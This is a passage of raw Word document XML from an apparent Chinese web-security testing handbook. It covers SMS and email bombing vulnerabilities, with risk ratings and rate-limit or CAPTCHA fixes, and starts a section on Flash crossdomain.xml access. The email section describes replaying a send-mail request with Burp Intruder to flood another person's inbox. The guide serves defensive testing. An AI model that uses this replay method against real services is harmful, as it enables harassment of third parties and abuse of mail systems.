        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可对任意手机号轰炸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B983D9" w14:textId="5856E3D9" w:rsidR="00A2726F" w:rsidRPr="00237589" w:rsidRDefault="00A2726F" w:rsidP="00237589">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：只可对当前手机号轰炸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D7FF38" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E8C62A" w14:textId="77777777" w:rsidR="002A6808" w:rsidRPr="00237589" w:rsidRDefault="002A6808" w:rsidP="00237589">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合理配置后台短信服务器的功能，对于同一手机号码，发送次数不超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-5</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次，并且可对发送的时间间隔做限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2666BE6B" w14:textId="50D20E80" w:rsidR="00B3517F" w:rsidRDefault="002A6808" w:rsidP="00237589">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面前台代码编写时，加入禁止针对同一手机号进行的次数大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次的发送，或者在页面中加入验证码功能，并且限制发送的时间间隔。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF7BF41" w14:textId="3171089D" w:rsidR="008F1DA6" w:rsidRPr="00237589" w:rsidRDefault="008F1DA6" w:rsidP="008F1DA6">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EA3D5C1" w14:textId="751D5821" w:rsidR="00B3517F" w:rsidRPr="00F757E4" w:rsidRDefault="00B3517F" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc498434539"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件炸弹</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="4987FB6F" w14:textId="54B95820"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00824E2C" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用系统未限制邮件的发送次数和频率，造成短时间内大量邮件发送至接收者邮箱，造成大量垃圾邮件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5B3DC" w14:textId="77777777"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A675D" w14:textId="60C64EDB" w:rsidR="00824E2C" w:rsidRPr="00F40EA4" w:rsidRDefault="00824E2C" w:rsidP="00F40EA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手工找到有关网站注册页面，认证页面，是否具有邮件发送页面，如果有，则进行下一步。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B91ACEE" w14:textId="099677A7" w:rsidR="00B3517F" w:rsidRPr="00F40EA4" w:rsidRDefault="00824E2C" w:rsidP="00F40EA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者其它抓包截断工具，抓取发送邮件的数据包，并且进行重放攻击，查看邮箱是否在短时间内连续收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>封以上邮件，如果收到大量邮件，则说明存在该漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4C668" w14:textId="558EDBA2" w:rsidR="00B3517F" w:rsidRPr="00F40EA4" w:rsidRDefault="00C24790" w:rsidP="00F40EA4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00B3517F" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00C3667A" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者通过填写他人的邮箱地址，使用软件</w:t>
      </w:r>
      <w:r w:rsidR="00C3667A" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00C3667A" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00C3667A" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intruder</w:t>
      </w:r>
      <w:r w:rsidR="00C3667A" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能重复提交发送邮件的请求包，达到短时间内向他人的邮箱中发送大量垃圾邮件的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366C5501" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5CA98C" w14:textId="79BDD904" w:rsidR="00724A05" w:rsidRPr="00F40EA4" w:rsidRDefault="00724A05" w:rsidP="00F40EA4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可对任意邮箱轰炸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505DD4E" w14:textId="1011C361" w:rsidR="00B3517F" w:rsidRPr="00F40EA4" w:rsidRDefault="00724A05" w:rsidP="00F40EA4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：只可对当前邮箱轰炸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D07E049" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1E2C03" w14:textId="6B20A056" w:rsidR="00305235" w:rsidRPr="00F40EA4" w:rsidRDefault="00305235" w:rsidP="00F40EA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合理配置后台</w:t>
      </w:r>
      <w:r w:rsidR="00B6400C" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的功能，对于同一</w:t>
      </w:r>
      <w:r w:rsidR="00B6400C" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发送次数不超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次，并且可对发送的时间间隔做限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF9034A" w14:textId="77777777" w:rsidR="008F1DA6" w:rsidRDefault="00305235" w:rsidP="00F40EA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidR="00B6400C" w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前台代码编写时，加入禁止针对同一邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行的次数大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次的发送，或者在页面中加入验证码功能，并且限制发送的时间间隔。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3234408A" w14:textId="5DFFF630" w:rsidR="00B3517F" w:rsidRPr="00F40EA4" w:rsidRDefault="008F1DA6" w:rsidP="008F1DA6">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A6341A3" w14:textId="5F929CB6" w:rsidR="00B00111" w:rsidRPr="00AD537C" w:rsidRDefault="00B00111" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc498434540"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限缺失</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="6CD9B958" w14:textId="23514D14" w:rsidR="00B00111" w:rsidRPr="00F757E4" w:rsidRDefault="00B00111" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc498434541"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨域访问</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="5DA4BDB0" w14:textId="77777777" w:rsidR="00656CFE" w:rsidRPr="00245D4F" w:rsidRDefault="00B00111" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00656CFE" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidR="00656CFE" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨域通信，依据的是</w:t>
      </w:r>
      <w:r w:rsidR="00656CFE" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crossdomain.xml</w:t>
      </w:r>
      <w:r w:rsidR="00656CFE" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。该文件配置在服务端，一般为根目录下，限制了</w:t>
      </w:r>
      <w:r w:rsidR="00656CFE" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidR="00656CFE" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否可以跨域获取数据以及允许从什么地方跨域获取数据。举个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140DF523"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hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.a.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域下不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crossdomain.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，则不允许除了</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.a.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域之外的其他任何域下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行跨域请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7681FE47"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hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.a.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域下存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crossdomain.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，如若配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow-access-from </w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.b.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则只允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.b.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行跨域请求，以及来自自身域</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.a.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的网络请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
